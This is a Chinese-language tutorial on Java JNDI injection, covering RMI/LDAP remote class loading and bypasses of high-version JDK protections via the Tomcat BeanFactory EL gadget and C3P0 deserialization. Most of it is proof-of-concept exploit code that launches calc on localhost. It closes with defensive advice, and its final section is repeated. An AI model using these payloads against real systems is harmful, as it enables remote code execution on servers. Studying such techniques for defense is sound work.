JNDI注入与高版本绕过技术详解<\/h1>

1. 低版本JNDI注入原理<\/h2>

1.1 RMI注入实现<\/h3>
恶意类构造<\/strong><\/p>
import<\/span> java.lang.Runtime;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> test<\/span>{<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span>{<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span>catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    public<\/span> test<\/span>(){}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>服务端代码<\/strong><\/p>
import<\/span> com.sun.jndi.rmi.registry.ReferenceWrapper;<\/span>
<\/span><\/span>import<\/span> javax.naming.Reference;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> RMIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>7777<\/span>);<\/span>
<\/span><\/span>        Reference reference =<\/span> new<\/span> Reference(<\/span>"test"<\/span>,<\/span> "test"<\/span>,<\/span> "http:\/\/localhost\/"<\/span>);<\/span>
<\/span><\/span>        ReferenceWrapper wrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>reference);<\/span>
<\/span><\/span>        registry.<\/span>bind<\/span>(<\/span>"calc"<\/span>,<\/span> wrapper);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>客户端代码<\/strong><\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDI_Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:7777\/calc"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.2 漏洞分析流程<\/h3>

调用链起点<\/strong>：RegistryContext.lookup()<\/code><\/li>
关键方法<\/strong>：decodeObject()<\/code> → getObjectInstance()<\/code><\/li>
类加载机制<\/strong>：

helper.loadClass(factoryName)<\/code> 尝试本地加载<\/li>
本地不存在时调用 helper.loadClass(factoryName, codebase)<\/code> 远程加载<\/li>
<\/ul>
<\/li>
触发点<\/strong>：clas.newInstance()<\/code> 实例化恶意类<\/li>
<\/ol>
完整调用栈<\/strong>：<\/p>
loadClass:73, VersionHelper12 (com.sun.naming.internal)
loadClass:61, VersionHelper12 (com.sun.naming.internal)
getObjectFactoryFromReference:146, NamingManager (javax.naming.spi)
getObjectInstance:319, NamingManager (javax.naming.spi)
decodeObject:464, RegistryContext (com.sun.jndi.rmi.registry)
lookup:124, RegistryContext (com.sun.jndi.rmi.registry)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:417, InitialContext (javax.naming)
<\/code><\/pre>
1.3 LDAP注入实现<\/h3>
使用yakit启动LDAP服务端，客户端代码：<\/p>
new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"ldap:\/\/127.0.0.1:8085\/ecEzwVXo"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用栈差异<\/strong>：

使用DirectoryManager.getObjectInstance<\/code>替代NamingManager.getObjectInstance<\/code><\/p>
2. 高版本JDK限制与绕过<\/h2>
2.1 高版本限制机制<\/h3>
在decodeObject<\/code>方法中添加判断：<\/p>
if<\/span> (<\/span>ref.<\/span>getFactoryClassLocation<\/span>()<\/span> !=<\/span> null<\/span> &&<\/span> !<\/span>trustURLCodebase)<\/span> {<\/span>
<\/span><\/span>    throw<\/span> new<\/span> ConfigurationException();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过条件<\/strong>：<\/p>

令ref<\/code>为空<\/li>
令ref.getFactoryClassLocation()<\/code>返回空<\/li>
令trustURLCodebase<\/code>为true<\/li>
<\/ol>
2.2 BeanFactory利用（Tomcat）<\/h3>
依赖配置<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.apache.tomcat<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>tomcat-catalina<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>8.5.0<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.apache.el<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>com.springsource.org.apache.el<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>7.0.26<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>服务端构造<\/strong>：<\/p>
Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>7777<\/span>);<\/span>
<\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> """.getClass().forName("<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>").newInstance().getEngineByName("<\/span>JavaScript").eval("<\/span>new<\/span> java.<\/span>lang<\/span>.<\/span>ProcessBuilder<\/span>[<\/span>'<\/span>(<\/span>java.<\/span>lang<\/span>.<\/span>String<\/span>[])<\/span>'<\/span>]([<\/span>'<\/span>calc'<\/span>]).<\/span>start<\/span>()<\/span>")"<\/span>));<\/span>
<\/span><\/span>ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"calc"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

使用本地工厂类org.apache.naming.factory.BeanFactory<\/code><\/li>
通过EL表达式实现代码执行<\/li>
classFactoryLocation<\/code>属性为空绕过检测<\/li>
<\/ul>
2.3 JavaBeanObjectFactory利用（C3P0）<\/h3>
依赖配置<\/strong>：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.mchange<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>c3p0<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>0.9.5.2<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>2.3.1 反序列化点分析<\/h4>
关键方法<\/strong>：getObjectInstance()<\/code>中的反序列化操作<\/p>
点1：REF_PROPS_KEY反序列化<\/strong><\/p>
BinaryRefAddr var9 =<\/span> (<\/span>BinaryRefAddr)<\/span>var6.<\/span>remove<\/span>(<\/span>"com.mchange.v2.naming.JavaBeanReferenceMaker.REF_PROPS_KEY"<\/span>);<\/span>
<\/span><\/span>if<\/span> (<\/span>var9 !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>    var12 =<\/span> (<\/span>Set)<\/span>SerializableUtils.<\/span>fromByteArray<\/span>((<\/span>byte<\/span>[])((<\/span>byte<\/span>[])<\/span>var9.<\/span>getContent<\/span>()));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>构造Payload<\/strong>：<\/p>
Reference ref =<\/span> new<\/span> Reference(<\/span>"java.lang.Object"<\/span>,<\/span> "com.mchange.v2.naming.JavaBeanObjectFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> BinaryRefAddr(<\/span>"com.mchange.v2.naming.JavaBeanReferenceMaker.REF_PROPS_KEY"<\/span>,<\/span> Utils.<\/span>base64ToByte<\/span>(<\/span>"base64序列化字节"<\/span>)));<\/span>
<\/span><\/span><\/code><\/pre>点2：createPropertyMap中的反序列化<\/strong><\/p>
Object val =<\/span> SerializableUtils.<\/span>fromByteArray<\/span>(<\/span>ba);<\/span>
<\/span><\/span><\/code><\/pre>2.3.2 setter方法利用<\/h4>
关键代码构造<\/strong>：<\/p>
Reference ref =<\/span> new<\/span> Reference(<\/span>"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"<\/span>,<\/span> "com.mchange.v2.naming.JavaBeanObjectFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>String poc =<\/span> "HEX序列化数据"<\/span>;<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"userOverridesAsString"<\/span>,<\/span> "HexAsciiSerializedMap:"<\/span> +<\/span> poc +<\/span> ";"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>触发流程<\/strong>：<\/p>

findBean<\/code>方法调用setter方法<\/li>
比较userOverridesAsString<\/code>与hex字节码<\/li>
触发VetoableChangeSupport.fireVetoableChange<\/code><\/li>
调用WrapperConnectionPoolDataSource.VetoableChange<\/code><\/li>
执行parseUserOverridesAsString<\/code>方法<\/li>
反序列化hex数据触发RCE<\/li>
<\/ol>
调试关键点<\/strong>：<\/p>

classFactoryLocation<\/code>为空绕过检测<\/li>
本地工厂类成功加载<\/li>
setter方法触发反序列化链<\/li>
<\/ul>
3. 技术总结<\/h2>
3.1 利用条件<\/h3>

存在JNDI注入点<\/li>
目标环境包含特定依赖（Tomcat\/C3P0）<\/li>
高版本JDK需使用本地工厂类绕过<\/li>
<\/ul>
3.2 防御建议<\/h3>

升级JDK版本并设置trustURLCodebase<\/code>为false<\/li>
限制不必要的依赖引入<\/li>
对JNDI查询进行输入验证和过滤<\/li>
使用安全管理器限制代码执行权限<\/li>
<\/ul>
3.3 技术演进<\/h3>
从低版本的远程类加载到高版本的本地工厂类利用，体现了安全防护与绕过技术的持续对抗。理解这些技术细节有助于更好地防御相关攻击。<\/p>
JNDI注入与高版本绕过技术详解<\/h1>

1. 低版本JNDI注入原理<\/h2>

3. 技术总结<\/h2>

3.3 技术演进<\/h3> 从低版本的远程类加载到高版本的本地工厂类利用，体现了安全防护与绕过技术的持续对抗。理解这些技术细节有助于更好地防御相关攻击。<\/p>

3.3 技术演进<\/h3>
从低版本的远程类加载到高版本的本地工厂类利用，体现了安全防护与绕过技术的持续对抗。理解这些技术细节有助于更好地防御相关攻击。<\/p>
